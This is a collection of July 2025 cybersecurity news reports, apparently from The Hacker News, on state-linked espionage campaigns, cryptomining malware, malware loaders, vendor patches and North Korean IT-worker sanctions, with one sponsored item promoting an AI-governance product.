Category: Cybersecurity

Jul 25, 2025Ravie LakshmananMalware / Threat Intelligence

The threat actor known as Patchwork has been attributed to a new spear-phishing campaign targeting Turkish defense contractors with the goal of gathering strategic intelligence.

“The campaign employs a five-stage execution chain delivered via malicious LNK files disguised as conference invitations sent to targets interested in learning more about unmanned vehicle systems,” Arctic Wolf Labs said in a technical report published this week.

The activity, which also singled out an unnamed manufacturer of precision-guided missile systems, appears to be geopolitically motivated as the timing coincides amid deepening defense cooperation between Pakistan and Türkiye, and the recent India-Pakistan military skirmishes.

Patchwork, also called APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson, is assessed to be a state-sponsored actor of Indian origin. Known to be active since at least 2009, the hacking group has a track record of striking entities in China, Pakistan, and other countries in South Asia.

Exactly a year ago, the Knownsec 404 Team documented Patchwork’s targeting entities with ties to Bhutan to deliver the Brute Ratel C4 framework and an updated version of a backdoor called PGoShell.

Since the start of 2025, the threat actor has been linked to various campaigns aimed at Chinese universities, with recent attacks using baits related to power grids in the country to deliver a Rust-based loader that, in turn, decrypts and launches a C# trojan called Protego to harvest a wide range of information from compromised Windows systems.

Another report published by Chinese cybersecurity firm QiAnXin back in May said it identified infrastructure overlaps between Patchwork and DoNot Team (aka APT-Q-38 or Bellyworm), suggesting potential operational connections between the two threat clusters.

The targeting of Türkiye by the hacking group points to an expansion of its targeting footprint, using malicious Windows shortcut (LNK) files distributed via phishing emails as a starting point to kick-off the multi-stage infection process.

Specifically, the LNK file is designed to invoke PowerShell commands that are responsible for fetching additional payloads from an external server (“expouav[.]org”), a domain created on June 25, 2025, that hosts a PDF lure mimicking an international conference on unmanned vehicle systems, details of which are hosted on the legitimate waset[.]org website.

“The PDF document serves as a visual decoy, designed to distract the user while the rest of the execution chain runs silently in the background,” Arctic Wolf said. “This targeting occurs as Türkiye commands 65% of the global UAV export market and develops critical hypersonic missile capabilities, while simultaneously strengthening defense ties with Pakistan during a period of heightened India-Pakistan tensions.”

Among the downloaded artifacts is a malicious DLL that’s launched using DLL side-loading by means of a scheduled task, ultimately leading to the execution of shellcode that carries out extensive reconnaissance of the compromised host, including taking screenshots, and exfiltrating the details back to the server.

“This represents a significant evolution of this threat actor’s capabilities, transitioning from the x64 DLL variants observed in November 2024, to the current x86 PE executables with enhanced command structures,” the company said. “Dropping Elephant demonstrates continued operational investment and development through architectural diversification from x64 DLL to x86 PE formats, and enhanced C2 protocol implementation through impersonation of legitimate websites.”

Jul 25, 2025Ravie LakshmananCybercrime / Insider Threat

The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned a North Korean front company and three associated individuals for their involvement in the fraudulent remote information technology (IT) worker scheme designed to generate illicit revenues for Pyongyang.

The sanctions target Korea Sobaeksu Trading Company (aka Sobaeksu United Corporation), and Kim Se Un, Jo Kyong Hun, and Myong Chol Min for evading sanctions imposed by the U.S. and the United Nations against the Democratic People’s Republic of Korea (DPRK) government.

“Our commitment is clear: Treasury, as part of a whole-of-government effort, will continue to hold accountable those who seek to infiltrate global supply chains and enable the sanctions evasion activities that further the Kim regime’s destabilizing agenda,” said Director of OFAC Bradley T. Smith.

The latest action marks the U.S. government’s continued efforts to dismantle North Korea’s wide-ranging revenue generation schemes and fund its illegal nuclear and ballistic missile programs.

The IT worker scheme, which has mutated into a global threat, entails the DPRK regime dispatching highly skilled IT workers to various locations, including China, Russia, and Vietnam, to obtain remote jobs and infiltrate U.S. companies and elsewhere using a combination of fraudulent documents, stolen identities, and false personas, often with help from facilitators who run laptop farms.

In what has been described as a recurring, if “baffling,” theme, many of these fake workers have been found to use Minions and other Despicable Me characters in social-media profiles and email addresses.

“The DPRK government withholds most of the wages earned by IT workers, generating hundreds of millions of dollars in revenue to support the North Korean regime’s unlawful weapons of mass destruction and ballistic missile programs,” the Treasury said. “In some cases, these DPRK IT workers have introduced malware into company networks to exfiltrate proprietary and sensitive data.”

The development comes merely weeks after OFAC sanctioned Song Kum Hyok, a 38-year-old member of a North Korean hacking group called Andariel, for their role in the IT worker scheme.

In related news, Christina Marie Chapman, 50, of Arizona, was sentenced to 8.5 years in prison for running a laptop farm for IT workers to give the impression that they were working remotely within the U.S. when, in reality, they were logging into those machines remotely. Chapman pleaded guilty earlier this February.

The impacted companies included a top-five major television network, a Silicon Valley technology company, an aerospace manufacturer, an American car maker, a luxury retail store, and a U.S. media and entertainment company. The IT workers also unsuccessfully attempted to land jobs at two different U.S. government agencies.

The U.S. Federal Bureau of Investigation (FBI) seized more than 90 laptops from Chapman’s home during an October 2023 raid. Chapman is also said to have 49 laptops at locations overseas, including multiple shipments to a Chinese city on the North Korean border.

In all, the elaborate counterfeit operation netted more than $17 million in illicit revenue for Chapman and North Korea from October 2020 to October 2023. Chapman has also been ordered to serve three years of supervised release, to forfeit $284,556 that was to be paid to the North Koreans, and to pay a judgment of $176,850.

“Christina Chapman perpetrated a years’ long scheme that resulted in millions of dollars raised for the DPRK regime, exploited more than 300 American companies and government agencies, and stole dozens of identities of American citizens,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division.

Jul 25, 2025Ravie LakshmananCyber Espionage / Malware

Russian aerospace and defense industries have become the target of a cyber espionage campaign that delivers a backdoor called EAGLET to facilitate data exfiltration.

The activity, dubbed Operation CargoTalon, has been assigned to a threat cluster tracked as UNG0901 (short for Unknown Group 901).

“The campaign is aimed at targeting employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia via using товарно-транспортная накладная (TTN) documents — critical to Russian logistics operations,” Seqrite Labs researcher Subhajeet Singha said in an analysis published this week.

The attack commences with a spear-phishing email bearing cargo delivery-themed lures that contain a ZIP archive, within which is a Windows shortcut (LNK) file that uses PowerShell to display a decoy Microsoft Excel document, while also deploying the EAGLET DLL implant on the host.

The decoy document, per Seqrite, references Obltransterminal, a Russian railway container terminal operator that was sanctioned by the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) in February 2024.

EAGLET is designed to gather system information and establish a connection to a hard-coded remote server (“185.225.17[.]104”) in order to process the HTTP response from the server and extract the commands to be executed on the compromised Windows machine.

The implant supports shell access and the ability to upload/download files, although the exact nature of the next-stage payloads delivered through this method is unknown, given that the command-and-control (C2) server is currently offline.

Seqrite said it also uncovered similar campaigns targeting the Russian military sector with EAGLET, not to mention source code and targeting overlaps with another threat cluster tracked as Head Mare that’s known to target Russian entities.

This includes the functional parallels between EAGLET and PhantomDL, a Go-based backdoor with a shell and file download/upload feature, as well as the similarities in the naming scheme used for the phishing message attachments.

The disclosure comes as the Russian state-sponsored hacking group called UAC-0184 (aka Hive0156) has been attributed to a fresh attack wave targeting victims in Ukraine with Remcos RAT as recently as this month.

While the threat actor has a history of delivering Remcos RAT since early 2024, newly spotted attack chains distributing the malware have been simplified, employing weaponized LNK or PowerShell files to retrieve the decoy file and the Hijack Loader (aka IDAT Loader) payload, which then launches Remcos RAT.

“Hive0156 delivers weaponized Microsoft LNK and PowerShell files, leading to the download and execution of Remcos RAT,” IBM X-Force said, adding it “observed key decoy documents featuring themes that suggest a focus on the Ukrainian military and evolving to a potential wider audience.”

Jul 25, 2025Ravie LakshmananMalware / Cloud Security

Threat hunters have disclosed two different malware campaigns that have targeted vulnerabilities and misconfigurations across cloud environments to deliver cryptocurrency miners.

The threat activity clusters have been codenamed Soco404 and Koske by cloud security firms Wiz and Aqua, respectively.

Soco404 “targets both Linux and Windows systems, deploying platform-specific malware,” Wiz researchers Maor Dokhanian, Shahar Dorfman, and Avigayil Mechtinger said. “They use process masquerading to disguise malicious activity as legitimate system processes.”

The activity is a reference to the fact that payloads are embedded in fake 404 HTML pages hosted on websites built using Google Sites. The bogus sites have since been taken down by Google.

Wiz posited that the campaign, which has been previously observed going after Apache Tomcat services with weak credentials, as well as susceptible Apache Struts and Atlassian Confluence servers using the Sysrv botnet, is part of a broader crypto-scam infrastructure, including fraudulent cryptocurrency trading platforms.

The latest campaign has also been found to target publicly-accessible PostgreSQL instances, with the attackers also abusing compromised Apache Tomcat servers to host payloads tailored for both Linux and Windows environments. Also hacked by the attackers is a legitimate Korean transportation website for malware delivery.

Once initial access is obtained, PostgreSQL’s COPY … FROM PROGRAM SQL command is exploited to run arbitrary shell commands on the host and achieve remote code execution.

“The attacker behind Soco404 appears to be conducting automated scans for exposed services, aiming to exploit any accessible entry point,” Wiz said. “Their use of a wide range of ingress tools, including Linux utilities like wget and curl, as well as Windows-native tools such as certutil and PowerShell, highlights an opportunistic strategy.”

On Linux systems, a dropper shell script is executed directly in memory to download and launch a next-stage payload, while simultaneously taking steps to terminate competing miners to maximize financial gain and limit forensic visibility by overwriting logs associated with cron and wtmp.

The payload executed in the next-stage is a binary that serves as a loader for the miner by contacting an external domain (“www.fastsoco[.]top”) that’s based on Google Sites.

The attack chain for Windows leverages the initial post-exploitation command to download and execute a Windows binary, which, like its Linux counterpart, functions akin to a loader that embeds both the miner and the WinRing0.sys driver, the latter being used to obtain NTSYSTEM privileges.

On top of that, the malware attempts to stop the Windows event log service and executes a self-deletion command to evade detection.

“Rather than relying on a single method or operating system, the attacker casts a wide net, deploying whichever tool or technique is available in the environment to deliver their payload,” the company said. “This flexible approach is characteristic of a broad, automated cryptomining campaign focused on maximizing reach and persistence across varied targets.”

The discovery of Soco404 dovetails with the emergence of a new Linux threat dubbed Koske that’s suspected to be developed with assistance from a large language model (LLM) and uses seemingly innocuous images of pandas to propagate the malware.

The attack starts with the exploitation of a misconfigured server, such as JupyterLab, to install various scripts from two JPEG images, including a C-based rootkit that’s used to hide malicious malware-related files using LD_PRELOAD and a shell script that ultimately downloads cryptocurrency miners on the infected system. Both payloads are directly executed in memory to avoid leaving traces on disk.

Koske’s end goal is to deploy CPU and GPU-optimized cryptocurrency miners that take advantage of the host’s computational resources to mine 18 distinct coins, such as Monero, Ravencoin, Zano, Nexa, and Tari, among others.

“These images are polyglot files, with malicious payloads appended to the end. Once downloaded, the malware extracts and executes the malicious segments in memory, bypassing antivirus tools,” Aqua researcher Assaf Morag said.

“This technique isn’t steganography but rather polyglot file abuse or malicious file embedding. This technique uses a valid JPG file with malicious shellcode hidden at the end. Only the last bytes are downloaded and executed, making it a sneaky form of polyglot abuse.”

Jul 25, 2025The Hacker NewsArtificial Intelligence / Data Privacy

A recent analysis of enterprise data suggests that generative AI tools developed in China are being used extensively by employees in the US and UK, often without oversight or approval from security teams. The study, conducted by Harmonic Security, also identifies hundreds of instances in which sensitive data was uploaded to platforms hosted in China, raising concerns over compliance, data residency, and commercial confidentiality.

Over a 30-day period, Harmonic examined the activity of a sample of 14,000 employees across a range of companies. Nearly 8 percent were found to have used China-based GenAI tools, including DeepSeek, Kimi Moonshot, Baidu Chat, Qwen (from Alibaba), and Manus. These applications, while powerful and easy to access, typically provide little information on how uploaded data is handled, stored, or reused.

The findings underline a widening gap between AI adoption and governance, especially in developer-heavy organizations where time-to-output often trumps policy compliance.

If you’re looking for a way to enforce your AI usage policy with granular controls, contact Harmonic Security.

Data Leakage at Scale

In total, over 17 megabytes of content were uploaded to these platforms by 1,059 users. Harmonic identified 535 separate incidents involving sensitive information. Nearly one-third of that material consisted of source code or engineering documentation. The remainder included documents related to mergers and acquisitions, financial reports, personally identifiable information, legal contracts, and customer records.

Harmonic’s study singled out DeepSeek as the most prevalent tool, associated with 85 percent of recorded incidents. Kimi Moonshot and Qwen are also seeing uptake. Collectively, these services are reshaping how GenAI appears inside corporate networks. It’s not through sanctioned platforms, but through quiet, user-led adoption.

Chinese GenAI services frequently operate under permissive or opaque data policies. In some cases, platform terms allow uploaded content to be used for further model training. The implications are substantial for firms operating in regulated sectors or handling proprietary software and internal business plans.

Policy Enforcement Through Technical Controls

Harmonic Security has developed tools to help enterprises regain control over how GenAI is used in the workplace. Its platform monitors AI activity in real time and enforces policy at the moment of use.

Companies have granular controls to block access to certain applications based on their HQ location, restrict specific types of data from being uploaded, and educate users through contextual prompts.

Governance as a Strategic Imperative

The rise of unauthorized GenAI use inside enterprises is no longer hypothetical. Harmonic’s data show that nearly one in twelve employees is already interacting with Chinese GenAI platforms, often with no awareness of data retention risks or jurisdictional exposure.

The findings suggest that awareness alone is insufficient. Firms will require active, enforced controls if they are to enable GenAI adoption without compromising compliance or security. As the technology matures, the ability to govern its use may prove just as consequential as the performance of the models themselves.

Harmonic makes it possible to embrace the benefits of GenAI without exposing your business to unnecessary risk.

Learn more about how Harmonic helps enforce AI policies and protect sensitive data at harmonic.security.

Jul 24, 2025Ravie LakshmananVirtualization / Network Security

Virtualization and networking infrastructure have been targeted by a threat actor codenamed Fire Ant as part of a prolonged cyber espionage campaign.

The activity, observed this year, is primarily designed Now to infiltrate organizations’ VMware ESXi and vCenter environments as well as network appliances, Sygnia said in a new report published today.

“The threat actor leveraged combinations of sophisticated and stealthy techniques creating multilayered attack kill chains to facilitate access to restricted and segmented network assets within presumed to be isolated environments,” the cybersecurity company said.

“The attacker demonstrated a high degree of persistence and operational maneuverability, operating through eradication efforts, adapting in real time to eradication and containment actions to maintain access to the compromise infrastructure.”

Fire Ant is assessed to share tooling and targeting overlaps with prior campaigns orchestrated by UNC3886, a China-nexus cyber espionage group known for its persistent targeting of edge devices and virtualization technologies since at least 2022.

Attacks mounted by the threat actor have been found to establish entrenched control of VMware ESXi hosts and vCenter servers, demonstrating advanced capabilities to pivot into guest environments and bypass network segmentation by compromising network appliances.

Another noteworthy aspect is the ability of the threat actor to maintain operational resilience by adapting to containment efforts, switching to different tools, dropping fallback backdoors for persistence, and altering network configurations to re-establish access to compromised networks.

Fire Ant’s breach of the virtualization management layer is achieved by the exploitation of CVE-2023-34048, a known security flaw in VMware vCenter Server that has been exploited by UNC3886 as a zero-day for years prior to it being patched by Broadcom in October 2023.

“From vCenter, they extracted the ‘vpxuser’ service account credentials and used them to access connected ESXi hosts,” Sygnia noted. “They deployed multiple persistent backdoors on both ESXi hosts and the vCenter to maintain access across reboots. The backdoor filename, hash and deployment technique aligned the VIRTUALPITA malware family.”

Also dropped is a Python-based implant (“autobackup.bin”) that provides remote command execution, and file download and upload capabilities. It runs in the background as a daemon.

Upon gaining unauthorized access to the hypervisor, the attackers are said to have leveraged another flaw in VMware Tools (CVE-2023-20867) to interact directly with guest virtual machines via PowerCLI, as well as interfered with the functioning of security tools and extracted credentials from memory snapshots, including that of domain controllers.

Some of the other crucial aspects of the threat actor’s tradecraft are as follows –

• Dropping V2Ray framework to facilitate guest network tunneling
• Deploying unregistered virtual machines directly on multiple ESXi hosts
• Breaking down network segmentation barriers and establishing cross-segments persistence
• Resist incident response and remediation efforts by re-compromising assets and, in some cases, blend in by renaming their payloads to impersonate forensic tools

The attack chain ultimately opened up a pathway for Fire Ant to maintain persistent, covert access from the hypervisor to guest operating systems. Sygnia also described the adversary as possessing a “deep understanding” of the target environment’s network architecture and policies in order to reach otherwise isolated assets.

Fire Ant is unusually focused on remaining undetected and leaves a minimal intrusion footprint. This is evidenced in the steps taken by the attackers to tamper with logging on ESXi hosts by terminating the “vmsyslogd” process, effectively suppressing an audit trail and limiting forensic visibility.

The findings underscore a worrying trend involving the persistent and successful targeting of network edge devices by threat actors, particularly those from China, in recent years.

“This campaign underscores the importance of visibility and detection within the hypervisor and infrastructure layer, where traditional endpoint security tools are ineffective,” Sygnia said.

“Fire Ant consistently targeted infrastructure systems such as ESXi hosts, vCenter servers, and F5 load balancers. The targeted systems are rarely integrated into standard detection and response programs. These assets lack detection and response solutions and generate limited telemetry, making them ideal long-term footholds for stealthy operation.”

Jul 24, 2025Ravie LakshmananVulnerability / Network Security

Mitel has released security updates to address a critical security flaw in MiVoice MX-ONE that could allow an attacker to bypass authentication protections.

“An authentication bypass vulnerability has been identified in the Provisioning Manager component of Mitel MiVoice MX-ONE, which, if successfully exploited, could allow an unauthenticated attacker to conduct an authentication bypass attack due to improper access control,” the company said in an advisory released Wednesday.

“A successful exploit of this vulnerability could allow an attacker to gain unauthorized access to user or admin accounts in the system.”

The shortcoming, which is yet to be assigned a CVE identifier, carries a CVSS score of 9.4 out of a maximum of 10.0. It affects MiVoice MX-ONE versions from 7.3 (7.3.0.0.50) to 7.8 SP1 (7.8.1.0.14).

Patches for the issue have been made available in MXO-15711_78SP0 and MXO-15711_78SP1 for MX-ONE versions 7.8 and 7.8 SP1, respectively. Customers using MiVoice MX-ONE version 7.3 and above are recommended to submit a patch request to their authorized service partner.

As mitigations until fixes can be applied, it’s advised to limit direct exposure of MX-ONE services to the public internet and ensure that they are placed within a trusted network.

Along with the authentication bypass flaw, Mitel has shipped updates to resolve a high-severity vulnerability in MiCollab (CVE-2025-52914, CVSS score: 8.8) that, if successfully exploited, could permit an authenticated attacker to carry out an SQL injection attack.

“A successful exploit could allow an attacker to access user provisioning information and execute arbitrary SQL database commands with potential impacts on the confidentiality, integrity, and availability of the system,” Mitel said.

The vulnerability, which impacts MiCollab versions 10.0 (10.0.0.26) to 10.0 SP1 FP1 (10.0.1.101) and 9.8 SP3 (9.8.3.1) and earlier, has been resolved in versions 10.1 (10.1.0.10), 9.8 SP3 FP1 (9.8.3.103), and later.

With shortcomings in Mitel devices coming under active attacks in the past, it’s essential that users move quickly to update their installations as soon as possible to mitigate potential threats.

Jul 24, 2025Ravie LakshmananMalware / Cybercrime

Cybersecurity researchers have shed light on a new versatile malware loader called CastleLoader that has been put to use in campaigns distributing various information stealers and remote access trojans (RATs).

The activity employs Cloudflare-themed ClickFix phishing attacks and fake GitHub repositories opened under the names of legitimate applications, Swiss cybersecurity company PRODAFT said in a report shared with The Hacker News.

The malware loader, first observed in the wild earlier this year, has been used to distribute DeerStealer, RedLine, StealC, NetSupport RAT, SectopRAT, and even other loaders like Hijack Loader.

“It employs dead code injection and packing techniques to hinder analysis,” the company said. “After unpacking itself at runtime, it connects to a C2 (command-and-control) server, downloads target modules, and executes them.”

CastleLoader’s modular structure allows it to act as both a delivery mechanism and a staging utility, enabling threat actors to separate initial infection from payload deployment. This separation complicates attribution and response because it decouples the infection vector from the eventual malware behavior, giving attackers more flexibility in adapting campaigns over time.

CastleLoader payloads are distributed as portable executables containing an embedded shellcode, which then invokes the main module of the loader that, in turn, connects to the C2 server in order to fetch and execute the next-stage malware.

Attacks distributing the malware have relied on the prevalent ClickFix technique on domains posing as software development libraries, videoconferencing platforms, browser update notifications, or document verification systems, ultimately tricking users into copying and executing PowerShell commands that activate the infection chain.

Victims are directed to the bogus domains through Google searches, at which point they are served pages containing fake error messages and CAPTCHA verification boxes developed by the threat actors, asking them to carry out a series of instructions to supposedly address the issue.

Alternatively, CastleLoader leverages fake GitHub repositories mimicking legitimate tools as a distribution vector, causing users who unknowingly download them to compromise their machines with malware instead.

“This technique exploits developers’ trust in GitHub and their tendency to run installation commands from repositories that appear reputable,” PRODAFT said.

This strategic abuse of social engineering mirrors techniques used in initial access brokers (IABs), underscoring its role within a broader cybercrime supply chain.

PRODAFT said it has observed Hijack Loader being delivered via DeerStealer as well as CastleLoader, with the latter also propagating DeerStealer variants. This suggests the overlapping nature of these campaigns, despite them being orchestrated by different threat actors.

Since May 2025, CastleLoader campaigns have leveraged seven distinct C2 servers, with over 1,634 infection attempts recorded during the time period. Analysis of its C2 infrastructure and its web-based panel—which is used to oversee and manage the infections – shows that as many as 469 devices were compromised, resulting in an infection rate of 28.7%.

Researchers also observed elements of anti-sandboxing and obfuscation—features typical in advanced loaders like SmokeLoader or IceID. Combined with PowerShell abuse, GitHub impersonation, and dynamic unpacking, CastleLoader reflects a growing trend in stealth-first malware loaders that operate as stagers in malware-as-a-service (MaaS) ecosystems.

“Castle Loader is a new and active threat, rapidly adopted by various malicious campaigns to deploy an array of other loaders and stealers,” PRODAFT said. “Its sophisticated anti-analysis techniques and multi-stage infection process highlight its effectiveness as a primary distribution mechanism in the current threat landscape.”

“The C2 panel demonstrates operational capabilities typically associated with malware-as-a-service (MaaS) offerings, suggesting the operators have experience in cybercriminal infrastructure development.”

Jul 24, 2025Ravie LakshmananNetwork Security / Vulnerability

Sophos and SonicWall have alerted users of critical security flaws in Sophos Firewall and Secure Mobile Access (SMA) 100 Series appliances that could be exploited to achieve remote code execution.

The two vulnerabilities impacting Sophos Firewall are listed below –

• CVE-2025-6704 (CVSS score: 9.8) – An arbitrary file writing vulnerability in the Secure PDF eXchange (SPX) feature can lead to pre-auth remote code execution, if a specific configuration of SPX is enabled in combination with the firewall running in High Availability (HA) mode
• CVE-2025-7624 (CVSS score: 9.8) – An SQL injection vulnerability in the legacy (transparent) SMTP proxy can lead to remote code execution, if a quarantining policy is active for Email and SFOS was upgraded from a version older than 21.0 GA

Sophos said CVE-2025-6704 affects about 0.05% of devices, while CVE-2025-7624 impacts as many as 0.73% of devices. Both vulnerabilities have been addressed alongside a high-severity command injection vulnerability in the WebAdmin component (CVE-2025-7382, CVSS score: 8.8) that could result in pre-auth code execution on High Availability (HA) auxiliary devices, if OTP authentication for the admin user is enabled.

Also patched by the company are two other vulnerabilities –

• CVE-2024-13974 (CVSS score: 8.1) – A business logic vulnerability in the Up2Date component can lead to attackers controlling the firewall’s DNS environment to achieve remote code execution
• CVE-2024-13973 (CVSS score: 6.8) – A post-auth SQL injection vulnerability in WebAdmin can potentially lead to administrators achieving arbitrary code execution

The U.K. National Cyber Security Centre (NCSC) has been credited with discovering and reporting both CVE-2024-13974 and CVE-2024-13973. The issues affect the following versions –

• CVE-2024-13974 – Affects Sophos Firewall v21.0 GA (21.0.0) and older
• CVE-2024-13973 – Affects Sophos Firewall v21.0 GA (21.0.0) and older
• CVE-2025-6704 – Affects Sophos Firewall v21.5 GA (21.5.0) and older
• CVE-2025-7624 – Affects Sophos Firewall v21.5 GA (21.5.0) and older
• CVE-2025-7382 – Affects Sophos Firewall v21.5 GA (21.5.0) and older

The disclosure comes as SonicWall detailed a critical bug in the SMA 100 Series web management interface (CVE-2025-40599, CVSS score: 9.1) that a remote attacker with administrative privileges can exploit to upload arbitrary files and potentially achieve remote code execution.

The flaw impacts SMA 100 Series products (SMA 210, 410, 500v) and has been addressed in version 10.2.2.1-90sv.

SonicWall also pointed out that while the vulnerability has not been exploited, there exists a potential risk in light of a recent report from the Google Threat Intelligence Group (GTIG), which found evidence of a threat actor dubbed UNC6148 leveraging fully-patched SMA 100 series devices to deploy a backdoor called OVERSTEP.

Besides applying the fixes, the company is also recommending that customers of SMA 100 Series devices carry out the following steps –

• Disable remote management access on the external-facing interface (X1) to reduce the attack surface
• Reset all passwords and reinitialize OTP (One-Time Password) binding for users and administrators on the appliance
• Enforce multi-factor authentication (MFA) for all users
• Enable Web Application Firewall (WAF) on SMA 100

Organizations using SMA 100 Series devices are also advised to review appliance logs and connection history for anomalies and check for any signs of unauthorized access.

Organizations using the SMA 500v virtual product are required to backup the OVA file, export the configuration, remove the existing virtual machine and all associated virtual disks and snapshots, reinstall the new OVA from SonicWall using a hypervisor, and restore the configuration.

Jul 24, 2025Ravie LakshmananCyber Espionage / Malware

The Tibetan community has been targeted by a China-nexus cyber espionage group as part of two campaigns conducted last month ahead of the Dalai Lama’s 90th birthday on July 6, 2025.

The multi-stage attacks have been codenamed Operation GhostChat and Operation PhantomPrayers by Zscaler ThreatLabz.

“The attackers compromised a legitimate website, redirecting users via a malicious link and ultimately installing either the Gh0st RAT or PhantomNet (aka SManager) backdoor onto victim systems,” security researchers Sudeep Singh and Roy Tay said in a Wednesday report.

This is not the first time Chinese threat actors have resorted to watering hole attacks (aka strategic web compromises), a technique where adversaries break into websites frequently visited by a specific group to infect their devices with malware.

Over the past two years, hacking groups like EvilBamboo, Evasive Panda, and TAG-112 have all resorted to the approach to target the Tibetan diaspora with the ultimate goal of gathering sensitive information.

Operation GhostChat

The latest set of attacks observed by Zscaler entails the compromise of a web page to replace the link pointing to “tibetfund[.]org/90thbirthday” with a fraudulent version (“thedalailama90.niccenter[.]net”).

While the original web page is designed to send a message to the Dalai Lama, the replica page adds an option to send an encrypted message to the spiritual leader by downloading from “tbelement.niccenter[.]net” a secure chat application named TElement, which claims to be Tibetan version of Element.

Hosted on the website is a backdoored version of the open-source encrypted chat software containing a malicious DLL that’s sideloaded to launch Gh0st RAT, a remote access trojan widely used by various Chinese hacking groups. The web page also includes JavaScript code designed to collect the visitor’s IP address and user-agent information, and exfiltrate the details to the threat actor via an HTTP POST request.

Operation PhantomPrayers

Gh0st RAT is a fully-featured malware that supports file manipulation, screen capture, clipboard content extraction, webcam video recording, keylogging, audio recording and playback, process manipulation, and remote shell.

The second campaign, Operation PhantomPrayers, has been found to leverage another domain, “hhthedalailama90.niccenter[.]net,” to distribute a phony “90th Birthday Global Check-in” app (“DalaiLamaCheckin.exe,” dubbed PhantomPrayers) that, when opened, displays an interactive map and urges victims to “send your blessings” for the Dalai Lama by tapping their location on the map.

However, the malicious functionality is stealthily triggered in the background, using DLL side-loading techniques to launch PhantomNet, a backdoor that establishes contact with a command-and-control (C2) server over TCP to receive additional plugin DLLs for execution on the compromised machine.

“PhantomNet can be set to operate only during specific hours or days, but this capability is not enabled in the current sample,” the researchers said. “PhantomNet used modular plugin DLLs, AES-encrypted C2 traffic, and configurable timed operations, to stealthily manage compromised systems.”